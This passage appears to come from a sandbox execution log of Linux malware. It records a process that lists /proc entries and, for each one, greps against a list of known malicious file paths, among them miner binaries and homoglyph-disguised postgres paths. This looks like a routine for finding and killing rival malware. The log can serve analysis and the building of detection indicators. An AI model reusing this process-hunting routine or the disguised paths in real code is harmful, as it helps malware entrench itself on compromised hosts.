  PID:1067
- /bin/ls
  ls -latrh /proc/717
  2⤵
  PID:1066
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1070
- /bin/ls
  ls -latrh /proc/72
  2⤵
  PID:1072
- /bin/grep
  grep exe
  2⤵
  PID:1073
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1075
- /bin/grep
  grep exe
  2⤵
  PID:1078
- /bin/ls
  ls -latrh /proc/722
  2⤵
  PID:1077
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1080
- /bin/ls
  ls -latrh /proc/73
  2⤵
  PID:1082
- /bin/grep
  grep exe
  2⤵
  PID:1083
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1085
- /bin/ls
  ls -latrh /proc/74
  2⤵
  PID:1087
- /bin/grep
  grep exe
  2⤵
  PID:1088
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1090
- /bin/grep
  grep exe
  2⤵
  PID:1093
- /bin/ls
  ls -latrh /proc/76
  2⤵
  PID:1092
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1095
- /bin/grep
  grep exe
  2⤵
  PID:1098
- /bin/ls
  ls -latrh /proc/77
  2⤵
  PID:1097
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1100
- /bin/ls
  ls -latrh /proc/78
  2⤵
  PID:1102
- /bin/grep
  grep exe
  2⤵
  PID:1103
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1105
- /bin/ls
  ls -latrh /proc/79
  2⤵
  PID:1107
- /bin/grep
  grep exe
  2⤵
  PID:1108
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1110
- /bin/ls
  ls -latrh /proc/8
  2⤵
  PID:1112
- /bin/grep
  grep exe
  2⤵
  PID:1113
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1115
- /bin/ls
  ls -latrh /proc/82
  2⤵
  PID:1117
- /bin/grep
  grep exe
  2⤵
  PID:1118
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1120
- /bin/ls
  ls -latrh /proc/9
  2⤵
  PID:1122
- /bin/grep
  grep exe
  2⤵
  PID:1123
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1125
- /bin/ls
  ls -latrh /proc/buddyinfo
  2⤵
  PID:1127
- /bin/grep
  grep exe
  2⤵
  PID:1128
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1130
- /bin/ls
  ls -latrh /proc/bus
  2⤵
  PID:1132
- /bin/grep
  grep exe
  2⤵
  PID:1133
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1135
- /bin/grep
  grep exe
  2⤵
  PID:1138
- /bin/ls
  ls -latrh /proc/cgroups
  2⤵
  PID:1137
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1140
- /bin/grep
  grep exe
  2⤵
  PID:1143
- /bin/ls
  ls -latrh /proc/cmdline
  2⤵
  PID:1142
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1145
- /bin/grep
  grep exe
  2⤵
  PID:1148
- /bin/ls
  ls -latrh /proc/consoles
  2⤵
  PID:1147
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1150
- /bin/ls
  ls -latrh /proc/cpuinfo
  2⤵
  PID:1152
- /bin/grep
  grep exe
  2⤵
  PID:1153
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1155
- /bin/ls
  ls -latrh /proc/crypto
  2⤵
  PID:1157
- /bin/grep
  grep exe
  2⤵
  PID:1158
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1160
- /bin/ls
  ls -latrh /proc/devices
  2⤵
  PID:1162
- /bin/grep
  grep exe
  2⤵
  PID:1163
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1165
- /bin/grep
  grep exe
  2⤵
  PID:1168
- /bin/ls
  ls -latrh /proc/device-tree
  2⤵
  PID:1167
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1170
- /bin/ls
  ls -latrh /proc/diskstats
  2⤵
  PID:1172
- /bin/grep
  grep exe
  2⤵
  PID:1173
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1175
- /bin/ls
  ls -latrh /proc/dma
  2⤵
  PID:1178
- /bin/grep
  grep exe
  2⤵
  PID:1179
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1182
- /bin/ls
  ls -latrh /proc/driver
  2⤵
  PID:1184
- /bin/grep
  grep exe
  2⤵
  PID:1185
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1187
- /bin/grep
  grep exe
  2⤵
  PID:1191
- /bin/ls
  ls -latrh /proc/execdomains
  2⤵
  PID:1190
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1194
- /bin/ls
  ls -latrh /proc/fb
  2⤵
  PID:1196
- /bin/grep
  grep exe
  2⤵
  PID:1197
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1200
- /bin/ls
  ls -latrh /proc/filesystems
  2⤵
  PID:1203
- /bin/grep
  grep exe
  2⤵
  PID:1204
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1206
- /bin/grep
  grep exe
  2⤵
  PID:1210
- /bin/ls
  ls -latrh /proc/fs
  2⤵
  PID:1209
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1213
- /bin/ls
  ls -latrh /proc/interrupts
  2⤵
  PID:1216
- /bin/grep
  grep exe
  2⤵
  PID:1217
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1220
- /bin/grep
  grep exe
  2⤵
  PID:1223
- /bin/ls
  ls -latrh /proc/iomem
  2⤵
  PID:1222
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1226
- /bin/grep
  grep exe
  2⤵
  PID:1230
- /bin/ls
  ls -latrh /proc/ioports
  2⤵
  PID:1229
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1232
- /bin/grep
  grep exe
  2⤵
  PID:1236
- /bin/ls
  ls -latrh /proc/irq
  2⤵
  PID:1235
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1239
- /bin/ls
  ls -latrh /proc/kallsyms
  2⤵
  PID:1241
- /bin/grep
  grep exe
  2⤵
  PID:1242
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1245
- /bin/ls
  ls -latrh /proc/kcore
  2⤵
  PID:1248
- /bin/grep
  grep exe
  2⤵
  PID:1249
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1251
- /bin/ls
  ls -latrh /proc/keys
  2⤵
  PID:1254
- /bin/grep
  grep exe
  2⤵
  PID:1255
- /bin/grep
